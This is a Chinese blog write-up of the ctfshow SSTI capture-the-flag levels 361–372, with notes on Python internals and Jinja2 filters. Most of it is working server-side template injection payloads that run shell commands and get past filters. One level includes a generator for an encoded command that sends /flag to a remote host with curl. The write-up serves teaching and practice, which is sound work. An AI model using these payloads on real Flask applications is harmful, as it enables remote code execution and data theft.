ctfshow-ssti

已于 2023-03-21 21:02:40 修改
阅读量335 收藏 4
点赞数 1
文章标签: flask python 后端 Powered by 金山文档
于 2023-03-09 19:57:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74456293/article/details/129429424
版权

认识SSTI

https://xz.aliyun.com/t/3679

SSTI模板注入绕过(进阶篇)_yu22x的博客-CSDN博客_ssti绕过

CTFshow-WEB入门-SSTI_bfengj的博客-CSDN博客

学习笔记

__class__            类的一个内置属性,表示实例对象的类。
 
__base__             类型对象的直接基类
 
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
 
__mro__              method resolution order,即解析方法调用的顺序;此属性是由类组成的元            组,在方法解析期间会基于它来查找基类。
 
__subclasses__()     返回这个类的子类集合,每个类都保留一个对其直接子类的弱引用列表。该方法返回一个列表,其中包含所有仍然存在的引用。列表按照定义顺序排列。
 
__init__             初始化类,返回的类型是function
 
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
 
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
 
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
 
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
 
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
 
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
 
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
 
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
 
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
 
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
 
current_app          应用上下文,一个全局变量。
 
request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
 
request.args.x1        get传参
 
request.values.x1      所有参数
 
request.cookies      cookies参数
 
request.headers      请求头参数
 
request.form.x1        post传参    (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
 
request.data           post传参    (Content-Type:a/b)
 
request.json         post传json  (Content-Type: application/json)
 
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
 
g                    {{g}}得到<flask.g of 'flask_ssti'>

常用过滤器

int():将值转换为int类型;
 
float():将值转换为float类型;
 
lower():将字符串转换为小写;
 
upper():将字符串转换为大写;
 
title():把值中的每个单词的首字母都转成大写;
 
capitalize():把变量值的首字母转成大写,其余字母转小写;
 
trim():截取字符串前面和后面的空白字符;
 
wordcount():计算一个长字符串中单词的个数;
 
reverse():字符串反转;
 
replace(value,old,new): 替换将old替换为new的字符串;
 
truncate(value,length=255,killwords=False):截取length长度的字符串;
 
striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;
 
escape()或e:转义字符,会将<、>等符号转义成HTML中的符号。显例:content|escape或content|e。
 
safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}};
 
list():将变量列成列表;
 
string():将变量转换成字符串;
 
join():将一个序列中的参数值拼接成字符串。示例看上面payload;
 
abs():返回一个数值的绝对值;
 
first():返回一个序列的第一个元素;
 
last():返回一个序列的最后一个元素;
 
format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!
 
length():返回一个序列或者字典的长度;
 
sum():返回列表内数值的和;
 
sort():返回排序后的列表;
 
default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。
 
length()返回字符串的长度,别名是count

web361

?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

web362

payload同上

web363

过滤了引号

request.args绕过

上面的 'os' 就可以写为 request.args.a&a=os

?name={{ config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag

web364

在上面的基础上过滤了args

request.args是GET传参,可以使用其他方式来代替args,如cookie

?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}
 
Cookie:a=os;b=popen;c=cat /flag

web365

在上面的基础上过滤了中括号 []

?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}
 
Cookie:a=cat /flag

web366

多过滤了下划线

这里用attr方法:request|attr(request.cookies.a)等价于request[“a”]

?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}
 
Cookie:a=__globals__;b=cat /flag

web367

过滤了os

?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}
 
Cookie:a=__globals__;b=os;c=cat /flag

web368

在上面的基础上过滤了{{

使用{%%}进行绕过

?name={% print(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read() %}
 
Cookie:a=__globals__;b=os;c=cat /flag

web369

?name={% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{%print(x.open(file).read())%}
 
构造po="pop"     #利用dict()|join拼接得到
{% set po=dict(po=a,p=a)|join%}
 
等效于a=(()|select|string|list).pop(24),即a等价于下划线_
{% set a=(()|select|string|list)|attr(po)(24)%}
 
构造ini="___init__"
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
 
构造glo="__globals__"
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
 
构造geti="__getitem__"
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
 
构造built="__builtins__"
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
 
调用chr()函数
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
 
构造file='/flag'
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}

原理是

{% set a=dict(o=oo,s=ss)|join %}

这样得到的a就是把这个字典的键名拼接后的值,即os,这样的拼接不需要用到单双引号,非常方便。至于要做的,就是想办法把类似_这样的字符通过一系列操作找出来就可以了

如何得到_?

{% set a=(()|select|string|list)|attr(po)(24)%}

a=_

web370

过滤了数字

?name=
{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set coun=(cc~cccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{%print(x.open(file).read())%}
分析如下
几个c就代表几,比如c=1,ccc=3
{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
用~拼接    构造coun=24
{% set coun=(cc~cccc)|int%}
同web369
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
调用chr()函数
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
构造file="/flag"
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}

web371

过滤了print

?name={% set c=(t|count)%}
{% set cc=(dict(e=a)|join|count)%}
{% set ccc=(dict(ee=a)|join|count)%}
{% set cccc=(dict(eee=a)|join|count)%}
{% set ccccc=(dict(eeee=a)|join|count)%}
{% set cccccc=(dict(eeeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set ccccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|count)%}
{% set coun=(ccc~ccccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set cmd=
%}
{%if x.eval(cmd)%}
abc
{%endif%}

cmd后面的内容由下面的代码生成

def aaa(t):
    t='('+(int(t[:-1:])+1)*'c'+'~'+(int(t[-1])+1)*'c'+')|int'
    return t
s='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def ccchr(s):
    t=''
    for i in range(len(s)):
        if i<len(s)-1:
            t+='chr('+aaa(str(ord(s[i])))+')%2b'
        else:
            t+='chr('+aaa(str(ord(s[i])))+')'
    return t
print(ccchr(s))

(流量被平台过滤,无法复现)

web372

过滤了count,可以用length替换

还可以用全角数字代替正常数字

半角转全角代码
 
def half2full(half):  
    full = ''  
    for ch in half:  
        if ord(ch) in range(33, 127):  
            ch = chr(ord(ch) + 0xfee0)  
        elif ord(ch) == 32:  
            ch = chr(0x3000)  
        else:  
            pass  
        full += ch  
    return full  
t=''
s="0123456789"
for i in s:
    t+='\''+half2full(i)+'\','
print(t)

参考博客:

CTFshow SSTI - _Nov1ce - 博客园

CTFSHOW-SSTI__Monica_的博客-CSDN博客_ctfshow ssti

CTFSHOW SSTI篇_yu22x的博客-CSDN博客_ctfshow ssti

踏雪寻玉
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
CTFSHOW-SSTI
Yb_140的博客
04-30 473
认识SSTI https://xz.aliyun.com/t/3679 SSTI模板注入绕过(进阶篇)_yu22x的博客-CSDN博客_ssti绕过 CTFshow-WEB入门-SSTI_bfengj的博客-CSDN博客 web361 ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} ?name={{ config.__class__.__init__.__globals__['
CTFshow SSTI
starttv的博客
11-21 609
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。SSTI 就是服务器端模板注入(Server-Side Template Injection)
easy_ssti_ctfshow_2023愚人杯
最新发布
PengXing_Huang的博客
05-06 198
ctfshow_2023愚人杯_easy_ssti题解
ctfshow-SSTI
ing_end的博客
05-07 659
SSTI web361 payload: ?name={{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} 之后打开 ?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
CTFshow——SSTI
D.MIND 的博客
03-06 1898
首先一定要了解有关python类的知识: python __base__等内置方法 python inspect模块解析 # coding=utf-8_ _author__ = "leaves" class Base(object): a = 0 def __init__(self): self._a = 10 pass class Child(Base): "测试测试" _b = 10 def __str__(
CTFSHOW SSTI
羽的博客
01-08 5882
文章目录web361web362web363web364web365web366、367web368web369web370web371web372 建议大家先看下笔者之前写的模板注入的文章 web361 payload name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 payload ?name={{x.__init__.__glo
ctfshow ssti
qq_45951598的博客
10-15 420
前言 开始SSTI,参考文章: 参考文章 flaskssti模版注入从零到入门 bfengj博客 yu22x 由于本人太菜了,只能先学其他大佬的博客先做题。 __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查
ctfshow--SSTI
qq_51684648的博客
03-15 579
ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777,判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、 在__builtin__中有众多的可用函数,包括eval 1: ?name={{ur
ctfshow ssti (通关)
qq_74806534的博客
03-09 222
猜测页面是get型,get一个name,我们在url后面输入一个?name=1这里利用os._wrap_close类,写个脚本来找。然后利用利用.init.globals来找os类中的。init初始化,globals全局查找其中能看到popen,于是利用其来执行命令。
CTFSHOW SSTI入门
v2ish1yan的博客
09-02 587
ssti入门题
CTFSHOW、SSTI模块
RealIiikun的博客
03-10 325
ctfshow_ssti模块

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值